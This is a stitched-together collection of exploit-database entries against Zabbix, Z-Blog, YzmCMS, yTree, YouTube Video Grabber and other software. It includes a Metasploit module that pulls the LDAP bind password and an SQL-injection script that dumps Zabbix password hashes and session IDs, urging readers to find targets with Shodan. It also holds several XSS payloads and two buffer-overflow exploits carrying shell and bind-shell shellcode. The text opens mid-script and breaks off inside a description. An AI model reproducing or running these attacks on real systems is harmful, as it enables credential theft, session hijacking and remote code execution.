### update
payload = {
"jsonrpc": "2.0",
"method": "script.update",
"params": {
"scriptid": "1",
"command": ""+cmd+""
},
"auth" : auth['result'],
"id" : 0,
}
cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))
### execute
payload = {
"jsonrpc": "2.0",
"method": "script.execute",
"params": {
"scriptid": "1",
"hostid": ""+hostid+""
},
"auth" : auth['result'],
"id" : 0,
}
cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
cmd_exe = cmd_exe.json()
print cmd_exe["result"]["value"]
##
# This module requires Metasploit
# Date: 25-09-2013
# Author: Pablo González
# Vendor Homepage: Zabbix -> http://www.zabbix.com
# Software Link: http://www.zabbix.com
# Version: 2.0.5
# Tested On: Linux (Ubuntu, Suse, CentOS)
# CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572
# More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572
# http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html
# http://seclists.org/fulldisclosure/2013/Sep/151
# http://www.cvedetails.com/cve/CVE-2013-5572/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'ldap_bind_password Zabbix CVE-2013-5572',
'Description' => %q{
Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access and reading the ldap_bind_password value in the HTML source code.
},
'License' => MSF_LICENSE,
'Author' => [ '@pablogonzalezpe, Pablo Gonzalez' ]
))
register_options([
OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']),
OptString.new('TARGETURI', [true, 'Path Zabbix Authentication','/zabbix/authentication.php']),
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
], self.class)
end
def run
req
end
def req
resp = send_request_cgi(
{
'host' => datastore['RHOST'],
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s),
'cookie' => "zbx_sessionid=#{datastore['zbx_session']}",
'content-type' => 'application/x-www-form-urlencoded'
}, datastore['TIMEOUT'])
ldap_host(resp)
user_passDomain(resp)
user_zabbix(resp)
end
def ldap_host(response)
cut = response.body.split("ldap_host\" value=\"")[1]
if cut != nil
host = cut.split("\"")[0]
print_good "LDAP Host => #{host}"
end
end
def user_passDomain(response)
cut = response.body.split("ldap_bind_dn\" value=\"")[1]
if cut != nil
user = cut.split("\"")[0]
print_good "User Domain? => #{user}"
end
cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
if cut != nil
pass = cut.split("\"")[0]
print_good "Password Domain? => #{pass}"
end
end
def user_zabbix(response)
cut = response.body.split("user\" value=\"")[1]
if cut != nil
user = cut.split("\"")[0]
print_good "User Zabbix => #{user}"
end
end
end
# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
# Data: 20-08-2016
# Software Link: www.zabbix.com
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
# Version: Zabbix 2.0-3.0.x(<3.0.4)
# PoC Author: Zzzians
# Contact: Zzzians@gmail.com
# Test on: Linux (Debian/CentOS/Ubuntu)
# -*- coding: utf_8 -*-
# Use Shodan or and enjoy :)
# Comb the intranet for zabbix and enjoy :)
import sys,os,re,urllib2
def Inject(url,sql,reg):
payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(payload, timeout=20).read()
except Exception, msg:
print '\t\tOpps,an error occurs...',msg
else:
result_reg = re.compile(reg)
results = result_reg.findall(response)
print payload #Uncomment this to see details
if results:
return results[0]
def exploit(url,userid):
passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
if(password):
print '[+]Username~Password : %s' % password
else:
print '[-]Get Password Failed'
session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
if(session_id):
print "[+]Session_id:%s" % session_id
else:
print "[-]Get Session id Failed"
print '\n'
def main():
print '=' * 70
print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc'
print '\t\t Author:Zzzians(Zzzians@gmail.com)'
print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
print '\t\t\t Time:2016-08-20\n'
urls = ["http://10.15.5.86"]
ids = [1,2]
for url in urls:
if url[-1] != '/': url += '/'
print '='*25 + url + '='*25
for userid in ids:
exploit(url,userid)
main()
# Exploit Title: Z-Blog 1.5.1.1740 Web Site physical path leakage Vulnerability
# Date: 2018-04-03
# Exploit Author: zzw (zzw@5ecurity.cn)
# Vendor Homepage: https://www.zblogcn.com/
# Software Link: https://github.com/zblogcn/zblogphp
# Version: 1.5.1.1740
# CVE : CVE-2018-7737
This is a WebSite physical path leakage vulnerability .
poc (visit the following pages):
http://localhost/z-blog//zb_system/admin/admin_footer.php
http://localhost/z-blog//zb_system/admin/admin_header.php
http://localhost/z-blog//zb_system/admin/admin_left.php
http://localhost/z-blog//zb_system/admin/admin_top.php
http://localhost/z-blog//zb_system/function/c_system_admin.php
http://localhost/z-blog//zb_system/function/c_system_misc.php
http://localhost/z-blog//zb_system/function/lib/category.php
http://localhost/z-blog//zb_system/function/lib/comment.php
http://localhost/z-blog//zb_system/function/lib/dbmysql.php
http://localhost/z-blog//zb_system/function/lib/dbmysqli.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_mysql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_pgsql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_sqlite.php
http://localhost/z-blog//zb_system/function/lib/dbpgsql.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite3.php
http://localhost/z-blog//zb_system/function/lib/member.php
http://localhost/z-blog//zb_system/function/lib/module.php
http://localhost/z-blog//zb_system/function/lib/networkcurl.php
http://localhost/z-blog//zb_system/function/lib/networkfile_get_contents.php
http://localhost/z-blog//zb_system/function/lib/networkfsockopen.php
http://localhost/z-blog//zb_system/function/lib/post.php
http://localhost/z-blog//zb_system/function/lib/sqlmysql.php
http://localhost/z-blog//zb_system/function/lib/sqlpgsql.php
http://localhost/z-blog//zb_system/function/lib/sqlsqlite.php
http://localhost/z-blog//zb_system/function/lib/tag.php
http://localhost/z-blog//zb_system/function/lib/upload.php
http://localhost/z-blog//zb_users/cache/compiled/default/comment.php
http://localhost/z-blog//zb_users/cache/compiled/default/comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/index.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-archives.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-authors.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-catalog.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-previous.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-statistics.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-tags.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-multi.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-page.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-single.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar2.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar3.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar4.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar5.php
http://localhost/z-blog//zb_users/cache/compiled/default/single.php
http://localhost/z-blog//zb_users/plugin/AppCentre/include.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkcurl.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfile_get_contents.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfsockopen.php
http://localhost/z-blog//zb_users/plugin/STACentre/include.php
http://localhost/z-blog//zb_users/plugin/Totoro/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_crawler.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_upload.php
http://localhost/z-blog//zb_users/theme/default/include.php
http://localhost/z-blog//zb_users/theme/metro/include.php
http://localhost/z-blog//zb_users/theme/WhitePage/include.php
the website will request like :
Fatal error: Interface 'iDataBase' not found in C:\phpStudy\WWW\Z-Blog\zb_system\function\lib\dbsqlite3.php on line 8
# Exploit Title: Z-Blog 1.5.1.1740 XSS Vulnerability
# Date: 2018-04-03
# Exploit Author: zzw (zzw@5ecurity.cn)
# Vendor Homepage: https://www.zblogcn.com/
# Software Link: https://github.com/zblogcn/zblogphp
# Version: 1.5.1.1740
# CVE : CVE-2018-7736
This is a XSS vulnerability than can attack the users.
poc:
poc of ZC_BLOG_SUBNAME parameter:
http://localhost/z-blog/zb_system/cmd.php?act=SettingSav&token=2c7ca9a4c1c3d856e012595ca878564f
post_data:
ZC_BLOG_HOST=http%3A%2F%2Flocalhost%2Fz-blog%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good%20Luck%20To%20You!tluf3%22%3e%3cscript%3ealert(1)%3c%2fscript%3euk095&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=
poc of ZC_UPLOAD_FILETYPE parameter:
post_data:
ZC_BLOG_HOST=http://localhost/z-blog/&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good+Luck+To+You!&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia/Shanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg|gif|png|jpeg|bmp|psd|wmf|ico|rpm|deb|tar|gz|sit|7z|bz2|zip|rar|xml|xsl|svg|svgz|rtf|doc|docx|ppt|pptx|xls|xlsx|wps|chm|txt|pdf|mp3|mp4|avi|mpg|rm|ra|rmvb|mov|wmv|wma|swf|fla|torrent|apk|zba|gzbauckek"><script>alert(1)</script>ekkgh&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=
# Exploit Title: YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-03-10
# Exploit Author: En
# Vendor Homepage: https://github.com/yzmcms/yzmcms
# Software Link: https://github.com/yzmcms/yzmcms
# Version: V5.5
# Category: Web Application
# Patched Version: unpatched
# Tested on: Win10x64
# Platform: PHP
# CVE : N/A
#Exploit Author: En_dust
#Description:
#The add function defined in the Application/link/controller/link.class.php file does not filter the ‘url’ parameter, causing malicious code to be executed.
#PoC:
POST /yzmcms/link/link/add.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/yzmcms/link/link/add.html
Content-Length: 130
Cookie: CNZZDATA1261218610=2106045875-1559549499-%7C1569374982; PHPSESSID=fr095t87brjfc0l7d7sgj8oml4; yzmphp_adminid=45dfDWXXjGQg2Ce7Yg7oJZbld7iy8SN43sy2SKjq; yzmphp_adminname=7e49R0HXcjLHqBu5wgd9vXbD_D-Bq3Uq8TLw5UNpi8lIAw
DNT: 1
Connection: close
name=evalWebsite&url=javascript%3Aalert(%2FXSS%2F)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1
# Exploit Title: YzmCMS 5.3 - 'Host' Header Injection
# Exploit Author: Debashis Pal
# Vendor Homepage: http://www.yzmcms.com/
# Source: https://github.com/yzmcms/yzmcms
# Version: YzmCMS V5.3
# CVE : N/A
# Tested on: Windows 7 SP1(64bit),XAMPP: 7.3.9
#About YzmCMS
==============
YzmCMS is a lightweight open source content management system that uses OOP (Object Oriented) to develop its own framework.
#Vulnerability
===============
Host Header Injection.
#PoC
=====
#YzmCMS V5.3 Access Path: TARGET/yzmcms/
curl http://TARGET/yzmcms/ -H "Host: www.google.com"
//sample output start
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>YzmCMS - 演示站</title>
<link href="http://www.google.com/yzmcms/common/static/css/default_common.css" rel="stylesheet" type="text/css" />
<link href="http://www.google.com/yzmcms/common/static/css/default_index.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/jquery-1.8.2.min.js"></script>
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/js.js"></script>
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/koala.min.1.5.js"></script> <!-- 焦点图js -->
<meta name="keywords" content="yzmcms,YzmCMS演示站,yzmcms站点" />
<meta name="description" content="本站是yzmcms演示站点" />
<meta http-equiv="mobile-agent" content="format=xhtml;url=http://TARGET/yzmcms/index.php?m=mobile">
<script type="text/javascript">if(window.location.toString().indexOf('pref=padindex') != -1){}else{if(/AppleWebKit.*Mobile/i.test(navigator.userAgent) || (/MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(navigator.userAgent))){if(window.location.href.indexOf("?mobile")<0){try{if(/Android|Windows Phone|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)){window.location.href="http://TARGET/yzmcms/index.php?m=mobile";}else if(/iPad/i.test(navigator.userAgent)){}else{}}catch(e){}}}}</script>
</head>
<body>
<!--mini登陆条-->
<div id="head_login">
<div class="w1000">
<div id="mini">
<a href="http://www.google.com/yzmcms/member/index/register.html" target="_blank">注册</a> <a href="http://www.google.com/yzmcms/member/index/login.html" target="_blank">登录</a>
</div>
欢迎光临本站!
</div>
</div>
<!--网站容器-->
<div id="container">
<div id="header">
<div id="logo">
<a href="http://TARGET/yzmcms/"><img src="http://www.google.com/yzmcms/common/static/images/logo.png" title="YzmCMS - 演示站" alt="YzmCMS - 演示站"></a>
</div>
<div id="search">
<form method="get" action="http://www.google.com/yzmcms/index.php" target="_blank">
<div id="searchtxt" class="searchtxt">
<div class="searchmenu">
//sample output End
#Solution
==========
Don’t trust the host header. Only allow whitelist hostnames.
#Disclosure Timeline
====================
Vulnerability Discover Date: 18-Sep-2019
Vulnerability Notification To vendor via Email: 18-Sep-2019, no responds
Open issue in github : 22-Sep-2019, no responds
Submit exploit-db : 25-Sep-2019
#Disclaimer
==========
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
# Exploit Title: YzmCMS 3.6 XSS Vulnerability
# Date: 2018-04-03
# Exploit Author: zzw (zzw@5ecurity.cn)
# Vendor Homepage: http://www.yzmcms.com/
# Software Link: http://www.yzmcms.com/
# Version: 3.6
# CVE : CVE-2018-7653
This is a XSS vulnerability than can attack the users.
poc:
http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes
http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes
http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes
http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes
# Exploit Author: Juan Sacco - http://www.exploitpack.com -jsacco@exploitpack.com
# Program affected: yTree - File manager for terminals v1.94-1.1
# Description: yTree is prone to a stack-based overflow, an attacker could exploit
# this issue to execute arbitrary code in the context of the application.
# Failed exploit attempts will result in a denial-of-service condition.
#
# Tested and developed on: Kali Linux 2.0 x86 - https://www.kali.org
#
# Program Description: This is a file manager that separates files from directories
# and allows you to select and manage files from different directories.
# It works on black and white or color terminals and is UTF-8 locales aware.
# Vendor homepage: http://www.han.de/~werner/ytree.html
# Kali Linux 2.0 package: pool/main/y/ytree/ytree_1.94-1.1_i386.deb
# MD5sum: 7d55d9c7e8afb4405c149463613f596b
#
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x41414141 EBX: 0xB7FB8000 ECX: 0x00000000 EDX: 0x08071342 o d I t s z a P c
# ESI: 0xBFFFF134 EDI: 0x41414141 EBP: 0x0806FC60 ESP: 0xBFFFDC50 EIP: 0xB7F888C1
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
# --------------------------------------------------------------------------[code]
# => 0xb7f888c1 <werase+49>: mov eax,DWORD PTR [eax+0x4c]
# 0xb7f888c4 <werase+52>: mov DWORD PTR [esp+0x24],eax
# 0xb7f888c8 <werase+56>: mov eax,DWORD PTR [edi+0x50]
# 0xb7f888cb <werase+59>: mov DWORD PTR [esp+0x28],eax
# 0xb7f888cf <werase+63>: mov eax,DWORD PTR [edi+0x54]
# 0xb7f888d2 <werase+66>: mov DWORD PTR [esp+0x2c],eax
# 0xb7f888d6 <werase+70>: mov eax,DWORD PTR [edi+0x58]
# 0xb7f888d9 <werase+73>: mov DWORD PTR [esp+0x30],eax
# --------------------------------------------------------------------------------
# 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5
# gdb$ backtrace
# 0 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5
# 1 0x08050f43 in ?? ()
# 2 0x08051182 in ?? ()
# 3 0x0805972f in ?? ()
# 4 0x0804a68a in ?? ()
# 5 0xb7d82a63 in __libc_start_main (main=0x804a560, argc=0x2, argv=0xbffff294, init=0x8064df0, fini=0x8064de0, rtld_fini=0xb7fedc90 <_dl_fini>, stack_end=0xbffff28c) at libc-start.c:287
# 6 0x0804a701 in ?? ()
import os,subprocess
def run():
try:
print "# yTree Buffer Overflow by Juan Sacco"
print "# It's fuzzing time on unusable exploits"
print "# This exploit is for educational purposes only"
# JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*65
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*1200
eip = "\xd0\xf6\xff\xbf"
subprocess.call(["ytree",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, yTree not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit yTree v1.94-1.1 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
source: https://www.securityfocus.com/bid/54859/info
YT-Videos Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/demo/ytvideos/play.php?id=2'
# Exploit Title: YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)
# Date: 01.11.2021
# Software Link: https://www.litexmedia.com/ytgrabber.exe
# Exploit Author: Achilles
# Tested Version: 1.9.9.1
# Tested on: Windows 7 64bit
# 1.- Run python code : YouTube.py
# 2.- Open EVIL.txt and copy All content to Clipboard
# 3.- Open YouTube Video Grabber and press Enter Code
# 4.- Paste the Content of EVIL.txt into the 'Name and Serial Nummer'
# 5.- Click 'OK'
# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
buffer = "\x41" * 712
nseh = "\xEB\x06\x90\x90" #jmp short 6
seh = struct.pack('<L',0x01c5642e) #pop ecx # pop ecx # ret | {PAGE_EXECUTE_WRITECOPY} [YouTubeGrabber.exe
nops = "\x90" * 20
#msfvenom -p windows/shell_bind_tcp LPORT=3110 -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d\x20"
buf = b""
buf += b"\x89\xe1\xd9\xc6\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x49\x78\x6e"
buf += b"\x62\x63\x30\x37\x70\x63\x30\x71\x70\x6d\x59\x4d\x35"
buf += b"\x56\x51\x6f\x30\x61\x74\x6c\x4b\x72\x70\x46\x50\x6e"
buf += b"\x6b\x43\x62\x56\x6c\x6c\x4b\x30\x52\x35\x44\x4c\x4b"
buf += b"\x31\x62\x54\x68\x74\x4f\x6e\x57\x42\x6a\x31\x36\x75"
buf += b"\x61\x49\x6f\x4e\x4c\x65\x6c\x50\x61\x33\x4c\x43\x32"
buf += b"\x36\x4c\x67\x50\x69\x51\x5a\x6f\x66\x6d\x47\x71\x5a"
buf += b"\x67\x4b\x52\x79\x62\x36\x32\x56\x37\x6e\x6b\x62\x72"
buf += b"\x44\x50\x4c\x4b\x51\x5a\x67\x4c\x6c\x4b\x52\x6c\x34"
buf += b"\x51\x32\x58\x5a\x43\x70\x48\x66\x61\x48\x51\x63\x61"
buf += b"\x6e\x6b\x31\x49\x31\x30\x65\x51\x38\x53\x4e\x6b\x50"
buf += b"\x49\x45\x48\x6a\x43\x77\x4a\x57\x39\x6c\x4b\x57\x44"
buf += b"\x6c\x4b\x76\x61\x4a\x76\x76\x51\x39\x6f\x6e\x4c\x4a"
buf += b"\x61\x5a\x6f\x34\x4d\x66\x61\x58\x47\x47\x48\x6d\x30"
buf += b"\x63\x45\x4a\x56\x54\x43\x71\x6d\x39\x68\x37\x4b\x71"
buf += b"\x6d\x57\x54\x62\x55\x68\x64\x56\x38\x6c\x4b\x30\x58"
buf += b"\x31\x34\x73\x31\x48\x53\x53\x56\x6e\x6b\x76\x6c\x52"
buf += b"\x6b\x6c\x4b\x32\x78\x65\x4c\x33\x31\x69\x43\x4c\x4b"
buf += b"\x77\x74\x4c\x4b\x65\x51\x38\x50\x6e\x69\x77\x34\x56"
buf += b"\x44\x65\x74\x31\x4b\x33\x6b\x50\x61\x42\x79\x73\x6a"
buf += b"\x30\x51\x6b\x4f\x4d\x30\x63\x6f\x61\x4f\x33\x6a\x6e"
buf += b"\x6b\x56\x72\x78\x6b\x4e\x6d\x61\x4d\x31\x78\x47\x43"
buf += b"\x46\x52\x37\x70\x75\x50\x52\x48\x62\x57\x70\x73\x45"
buf += b"\x62\x43\x6f\x42\x74\x63\x58\x50\x4c\x62\x57\x55\x76"
buf += b"\x36\x67\x59\x6f\x4a\x75\x6e\x58\x4c\x50\x37\x71\x75"
buf += b"\x50\x67\x70\x51\x39\x39\x54\x46\x34\x62\x70\x42\x48"
buf += b"\x44\x69\x4f\x70\x30\x6b\x75\x50\x59\x6f\x48\x55\x32"
buf += b"\x4a\x53\x38\x76\x39\x50\x50\x69\x72\x59\x6d\x37\x30"
buf += b"\x70\x50\x37\x30\x50\x50\x61\x78\x69\x7a\x54\x4f\x4b"
buf += b"\x6f\x59\x70\x59\x6f\x58\x55\x4e\x77\x31\x78\x34\x42"
buf += b"\x57\x70\x66\x6c\x74\x66\x4e\x69\x59\x76\x73\x5a\x44"
buf += b"\x50\x71\x46\x71\x47\x33\x58\x6a\x62\x79\x4b\x30\x37"
buf += b"\x50\x67\x59\x6f\x79\x45\x56\x37\x70\x68\x4d\x67\x39"
buf += b"\x79\x67\x48\x6b\x4f\x79\x6f\x4b\x65\x36\x37\x71\x78"
buf += b"\x44\x34\x68\x6c\x55\x6b\x38\x61\x69\x6f\x5a\x75\x70"
buf += b"\x57\x6d\x47\x75\x38\x42\x55\x42\x4e\x32\x6d\x71\x71"
buf += b"\x6b\x4f\x4a\x75\x62\x48\x71\x73\x52\x4d\x61\x74\x55"
buf += b"\x50\x6d\x59\x68\x63\x73\x67\x63\x67\x61\x47\x76\x51"
buf += b"\x5a\x56\x32\x4a\x75\x42\x51\x49\x63\x66\x59\x72\x79"
buf += b"\x6d\x43\x56\x78\x47\x37\x34\x57\x54\x65\x6c\x46\x61"
buf += b"\x67\x71\x6e\x6d\x43\x74\x76\x44\x64\x50\x4b\x76\x67"
buf += b"\x70\x70\x44\x42\x74\x50\x50\x52\x76\x30\x56\x63\x66"
buf += b"\x42\x66\x52\x76\x52\x6e\x36\x36\x51\x46\x46\x33\x46"
buf += b"\x36\x42\x48\x44\x39\x6a\x6c\x35\x6f\x6e\x66\x59\x6f"
buf += b"\x78\x55\x6d\x59\x4b\x50\x32\x6e\x62\x76\x42\x66\x6b"
buf += b"\x4f\x36\x50\x75\x38\x63\x38\x6f\x77\x65\x4d\x51\x70"
buf += b"\x39\x6f\x49\x45\x6d\x6b\x59\x70\x65\x4d\x67\x5a\x54"
buf += b"\x4a\x35\x38\x4d\x76\x6c\x55\x6f\x4d\x6d\x4d\x4b\x4f"
buf += b"\x68\x55\x35\x6c\x56\x66\x53\x4c\x35\x5a\x6b\x30\x69"
buf += b"\x6b\x59\x70\x50\x75\x37\x75\x6d\x6b\x72\x67\x32\x33"
buf += b"\x33\x42\x70\x6f\x43\x5a\x37\x70\x31\x43\x79\x6f\x79"
buf += b"\x45\x41\x41"
pad ="B" * (7280 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
payload = buffer + nseh + seh + nops + buf + pad
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: YouTube Automated CMS 1.0.1 / 1.0.7 - CSRF to Persistent XSS
# Date: 14 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Software Link: https://codecanyon.net/item/youtube-automated-cms/12021939
# Version: 1.0.1 to 1.0.7
----------------------------------------------------------------------------------------------------------------------
Description:
An Attackers are able to execute js and perform CSRF on web
application using YouTube Automated CMS which allow an attacker to
create a post when an authenticated user/admin browses a special
crafted web page. All the process was also possible without any
authenticated user/admin for more info watch the below PoC Video.
The title parameter was not filtering special characters mean
vulnerable to XSS. So, now by creating CSRF exploit code for posting
an article with XSS alert JS payload as title of post. Now if the
attacker is able to perform CSRF attack sucessfully then XSS will be
triggered when someone opens the site using YouTube Automated CMS.
